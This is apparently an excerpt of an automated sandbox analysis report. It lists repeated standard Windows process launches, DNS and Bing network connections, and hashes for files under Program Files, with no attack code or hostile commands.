C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
Files
C:\Program Files\7-Zip\7zFM.exe
| MD5 | 45d3d62890fa98b808e4379a0a399baf |
| SHA1 | 5b5459717f961d20f002e3c5d3268906a71e7f73 |
| SHA256 | de96183d3d1e3c5a790c8fb31df0c6879d3bf1ca64b10be23452b58ee8e2b69e |
| SHA512 | 748cdde074183fe2780a236a9cf3e8141c5a79f492cad5656e44f706a74a58575015181d32d39bc177a4b68a045f7f0b836ba9d66e73fefe9877efb5744d6f2f |
C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\es\readme.txt
| MD5 | dbac9649c4bd702f55fbd1afafe87c44 |
| SHA1 | 0d914f4a809cfe400ca111ebfbd0ad552d500785 |
| SHA256 | b9dfa3b30224bd5eef298531c945d5f2f6bb978b7ef42e5ef09715a535172127 |
| SHA512 | 86d7786b400303b1fb722689aba7e8ef6a01ad7e2776194c5d545a7d7357dd91e7079296790587210683db7f4385f98f281272fd3d1ad6770dabf401709a6415 |
C:\Program Files\Java\jre-1.8\legal\jdk\pkcs11wrapper.md
| MD5 | 950ac8e007b49ed7acf1646758393817 |
| SHA1 | 3a795f27aac36ba92f33165a6550cc7f201b3254 |
| SHA256 | 4ab0585ac1cc953813901847e774a0a6e2542bedd0e5964cacf31e421455223e |
| SHA512 | 6bf7c6bdc1f802cdc8cea1d5a22de2e2cdf307411504499351fa5e9bdb7d1826c1968c4cc8bbb2fc17ea69850d69e0e2d77b76d29ad991813b598fc18ea0982e |
C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME-JAVAFX.txt
| MD5 | f0be99f92d8b8ad3d79c9aa580fc2f08 |
| SHA1 | a9ab5160208575c2c19277491406d5c95690a5f0 |
| SHA256 | e290cb91a6aaf54bb397c8f72d0bf5e8a70935ca00abde862e3d13fdf75fdbb0 |
| SHA512 | c9c2002d0f14f1d92924f80105c4b092bcb8de5bcb838179f2129b125fbcdf83f78ee80f44b0e26bab451c6fa5d6a29547a4933a92858e310dfbbdcee32f8cae |
C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Slipstream.xml
| MD5 | c181d62d13f055127f354bb60cdfa03b |
| SHA1 | 6cbfcbcdb417807d7ce1ffeeaa2eaaf9b548885a |
| SHA256 | d8dc1b9aa2aefd658fae2d9b6bf36318bdda72fcecba0538a1f121592b44e3b6 |
| SHA512 | 62dd4c375f5e3299843c78dc86026da551a8a66c2c4cfac4003b8e4774ddd1cc36c130611c15182b61a472169305b75c845f17ec899e53250461867cc82abd36 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_2x.png
| MD5 | 7d00bc0d46dcb90890a4fe6b76bc5c3a |
| SHA1 | 7159b1e1c264a6863708a971eaeca32cff864aa1 |
| SHA256 | 2fcd2848cbcab1a3b8154138288cc659cd2c187412cb887eec6554b6165b8c33 |
| SHA512 | 2f113cb27028aa0fa0f028b09ddcddb4a1ede6ae0823909d99763db6e5be57b1b4ae6977537ec17808cd622bc548e1ba3122e35b58de9d856400d33042234a35 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_hover.png
| MD5 | 1dc5d31ef9205f1034b64d635d59cb32 |
| SHA1 | c172576576c5ac5a3c2912bdfd0c8365b5365513 |
| SHA256 | 676d1f912a22a12ad4c80bf552355a7e0995c56e6ef7527aaa9b77e513efc065 |
| SHA512 | bc334638acb1416787df04cbaebde99cd15d96c5b96b6f950cbdfb54177fcd2f2ecce4dc9212a9a3f2f85269ac901aef147ec6297c31c5ee6cc39ee4cdac17c1 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-il\ui-strings.js
| MD5 | 6e8d259daabf1168ae5136a3de48ee80 |
| SHA1 | b015257e3ae0810ddbda53c0b12991161a863ffb |
| SHA256 | 13370a65ca7e31fbf3a133156c208bf99c01a54880d55a8a4500495683e3a47f |
| SHA512 | cf3c564c18c6b0965a431cda1ed8fa97cbeeb839d992e48f77c073bc8054ead03b4823df381c5179d3d398877da3473b92d70ae905a2bd0c7e5fc45505340113 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\ui-strings.js
| MD5 | 88151ac4ebd7f5ff2d381c65e68cece7 |
| SHA1 | f979db4063d15ef2e32db3c38890899bb87c78e5 |
| SHA256 | c1ea4ada9462abd4ec352dfaf670575e9caff1e55d303db96a2f2500d50d92e8 |
| SHA512 | 326195f5176beed6cc39849b8d6e87a5136c41a04aa76f53c30bbed1ff74391e16a6114e236f39d403c7f82fda032c00a9ee1df583412dfea224047e51f4c3bb |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\root\ui-strings.js
| MD5 | 60f1a26612dc049ce3e00fe917b6475d |
| SHA1 | 05791d089cbcd759088adbbd9483433dc9a10206 |
| SHA256 | 8ced84488e1ea81e8cc3ec1a25f5b849de902601bef557b6ec65f9de2982bece |
| SHA512 | 06f080a9df9081a2bfd557165f9c21cf2bce3ee161c0896a9f9a6e0f8a3ae545b1cfaaca9ce1d46757dbe0163ddd0421bdb51558ef092dd0a6e5c2052ead4706 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons.png
| MD5 | ea321d33cfeb1d029794bd01c5b78e85 |
| SHA1 | 4e04b2d8f7f23f44f96f4bbf134233e1feb5e28b |
| SHA256 | 3add439f478220ce8001abf2543810144a0d80f8116bc0ca13947c9745983c55 |
| SHA512 | f574d12330a668d89402265cf5a859a76325ed548e1730e02f51dfd36e3d5dccf2c8b75a76a8c931597bfc130a42364c73eef0200523d4eefbcf4fa5ccacddea |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons2x.png
| MD5 | a660ce180dea34b4944d83569f4789bc |
| SHA1 | e3ca7b90c8bd299c49585bd29bc3fb7494c0fa4e |
| SHA256 | 03ab6f2f396e0531f1b1299b61485408cff93f183942910a7d0d5f0c7a666bd8 |
| SHA512 | 9de185c0e6a8cc49852ebb454a00a7a19f5382b358327d393a6952b32099036147c1eb799cc60078bf24477e9607a1b4c88288a213a8ffcafd8d60caab0f0720 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\ui-strings.js
| MD5 | cdc58b2bf0a1a34f96af8fdcb62dc30b |
| SHA1 | 69eb0d674e9830e81cecdd610792225a2a5dc265 |
| SHA256 | 3b5888b652cd86408bdd59e86405d3f171d23132059228544fbe693cfcb2b73c |
| SHA512 | d8ef3220b8984f759347a0e83eb75939c914bf865db492d28e226f113b469a97325befa008886743aeae2e0f32c74c0a1e7ce8b60eaf5949b51058a618daa502 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png
| MD5 | 55c2b47c9aea50661a855fe91eb8ac32 |
| SHA1 | 13ea23a51394ea2c13420ddac1294eae6f82f846 |
| SHA256 | ba5a59d879c1f6543b46085d02f5c90fdb22e663487d3586b6533cd887c83b72 |
| SHA512 | 947da2e85f5c21e7847f10d727729915973c911a47de233ef1fb97f60ae41db05f4c8c0ee655e3aa264db2067763e4134b76279f1d3ea8ad43640a64176522a3 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png
| MD5 | 808e7aedbb1da793b86c92816309035e |
| SHA1 | b4a2fca53290a35ae222f2cdf80f68ec7eab51e6 |
| SHA256 | a90f0edb8324760029a5db9f641b05694f8717c25514b2d6abde7662c827e0cb |
| SHA512 | 0af4e6a83661378b618c40de02c6cb7244be544dcb02f1f14c83b6abd791fa0330b6d508c86f0ba8e345608639d8505a2f26d3a6d3ae201bb01319c10c212d4a |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-il\ui-strings.js
| MD5 | 5c1dc195043bdea8525930a9882c10d7 |
| SHA1 | 17415e551255ab016f7682d7b33451cfcb91e687 |
| SHA256 | 019bad9e72430b758828953e3310007695c55fed1d25fdd707c76fec561f2bc5 |
